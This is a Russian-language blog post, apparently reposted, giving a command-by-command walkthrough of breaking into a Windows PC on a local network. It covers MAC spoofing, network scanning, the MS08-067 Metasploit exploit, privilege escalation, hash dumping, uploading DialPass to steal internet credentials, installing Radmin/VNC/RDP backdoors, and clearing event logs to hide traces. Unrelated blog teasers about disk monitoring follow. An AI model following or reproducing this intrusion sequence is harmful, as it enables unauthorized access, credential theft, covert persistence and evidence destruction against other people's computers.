Metasploit Framework в бою

 

Организация взлома ПК внутри локальной сети посредством Metasploit Framework

Далее комментарии по происходящему. В начале меняем свой MAC адрес при помощи пакета macchanger.

sudo macchanger eth0 --mac=00:11:22:33:44:55


Перед этой процедурой интерфейс eth0 должен быть отключен вот так:

sudo ifconfig eth0 down


Далее включаем интерфейс eth0 и смотрим изменился ли MAC адрес1

sudo ifconfig eth0 up
ifconfig eth0


Используя пакет arp-scan посмотрим кто есть в сети:

sudo arp-scan -l -I eth0


Выбираем жертву и смотрим на открытые порты посредством nmap

nmap 192.168.84.58


135/tcp msrpc навел на мысль о возможной дыре в безопасности данного пк т.е. о ms08-067. Уязвимость в библиотеке netapi32.dll при выполнении RPC запросов к службе Server. С помощью специально сформированного RPC запроса можно вызвать переполнение буфера и вызвать отказ в обслуживании системы, либо выполнить произвольный код от учетной записи SYSTEM. Подробнее… Далее для исполнения данной атаки запускаем Metasploit Framework и загружаем эксплоит для данной ошибки.

msfconsole
use exploit/windows/smb/ms08_067_netapi


Смотрим на обязательные параметры эксплоита и заполняем их.

show options
set RHOST 192.168.84.58


Проверяем есть ли уязвимость, видим что есть, атакуем.1
check
exploit

Узнаем наши права в системе и если необходимо повышаем привилегий до системных. 

getuid
getsystem


Далее вытаскиваем пароли, брутим их по словарю в SAMInside1 hashdump


Заливаем DialPass на компьютер жертвы и уводим логин и пароль на доступ в интернет. Удаляем следы данной операции.

upload exploit/dialpass/dp.exe dp.exe
execute -f "dp.exe /stext dp"
cat dp
del dp dp.exe


Заливаем Radmin для дальнейшего эксплуатации данного компьютера. Смотрим в новой консоли открылся ли порт и удаляем следы данной операции.

upload exploit/radmin/radmin.exe radmin.exe
execute -f "radmin.exe"
nmap 192.168.84.58
del radmin.exe


Запускаем VNC соединение (прим. для этого необходимо установить пакет vncviewer) и настраиваем RDP доступ к компьютеру (Radmin это хорошо, но мало ли что случится).1 run vnc


Ну а далее запускаем remmina, подключаемся по RDP и удаляем лишние файлы. Далее зачищаем за собой и уходим. Удаляем хост из базы Metasploit Framework.

clearev
exit
hosts -d 192.168.84.58


Смотрим какие порты открыты и убеждаемся, что Radmin и RDP функционируют.

nmap 192.168.84.58

Вот так я порутал свой PC =).

источник: chelaxe.ru


Комментарии

Отправить комментарий

Популярные сообщения из этого блога

S.M.A.R.T. (часть 3). Расшифровка и понимание SMART атрибутов

Изображение
Маленький рассказ об S.M.A.R.T. атрибутах, их важности и понимании. В статье пойдет речь об расшифровке всех smart атрибутов ATA дисков. В предыдущих статьях речь шла об  мониторинге BBU  и  жестких SCSI дисков и их атрибутов под Megaraid контроллером . Теперь хочу немного описать атрибуты обычных АТА дисков на примере Seagate Barracuda ES.2 (ST31000340NS). Так же определим самые важные атрибуты, на которые нужно обращать внимание при мониторинге дисков используя smartctl. Для начала, можно убедиться, что наш диск поддерживает смарт 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 root@ s01:~ # smartctl -i /dev/sda smartctl 5.41 2011-06-09 r3365 [x86_64-linux-3.8.0-29-generic] ( local build) Copyright (C) 2002-11 by Bruce Allen, http: //smartmontools .sourceforge.net === START OF INFORMATION SECTION === Model Family:     Seagate Barracuda ES.2 Device Model:     ST31000340NS Serial Number:...
Далее...

S.M.A.R.T. (часть 2). Мониторинг BBU RAID контроллеров

Изображение
В  предыдущей статье  шла речь об установки megacli для мониторинга дисков под LSI 2108 Megaraid контроллеров. Сейчас же я хочу немного описать мониторинг батареи (BBU) для RAID контроллеров в целом. Какие шаги нужно предпринимать и как не наделать лишних проблем для себя при возникновении ошибок или неполадок с BBU (Battery Backup Unit). Состояние батареи нужно периодически проверять. Для RAID контроллеров этот компонент вообще может отсутствовать, так как его основное предназначение – это держать в кэше данные, которые еще не записались на диск, т.е. сохранение целостности данных при сбое питания (внезапное отключения подачи электричества). На данный момент, почти все рейд контроллеры поддерживают кэширование данных на уровне контроллера. Т.е. каждый физический диск имеет свой кэш плюс кэш контроллера. Такой подход повышает производительность системы при сохранение большого количества данных или же при очень высоком уровне отдачи контента конечным пользователям. Ес...
Далее...

Обзор системы хранения Intel SS4200-E начального уровня

Изображение
Введение С одного взгляда Товар Система хранения Intel начального  уровня  (  SS4200-E  ) Резюме Четырехдисковый RAID 5 BYOD SATA NAS с лучшей производительностью. Плюсы • Вверху диаграммы Производительность чтения / записи RAID 5 • Поддержка AD • Комплектное клиентское программное обеспечение EMC Retrospect для ПК / Mac • Два порта e-SATA Минусы • RAID ограничен до 0 + 1 и RAID 5 • Диски не поддерживают  горячую замену  • Нет поддержки Jumbo frame • Нет поддержки расширения RAID или миграции RAID Если вы подумываете о покупке NAS-устройства BYOD с 4 дисками, на ум приходят, скорее всего,  Synology  ,  QNAP  ,  Thecus  ,  Linksys  и, возможно,  Zyxel  .  Хотя корпорация Intel уже много лет занимается производством систем хранения, ее часто упускают из виду как поставщика BYOD NAS.  И все же  система хранения  Intel  начального уровня SS4200-E  предлагает потрясающую производител...
Далее...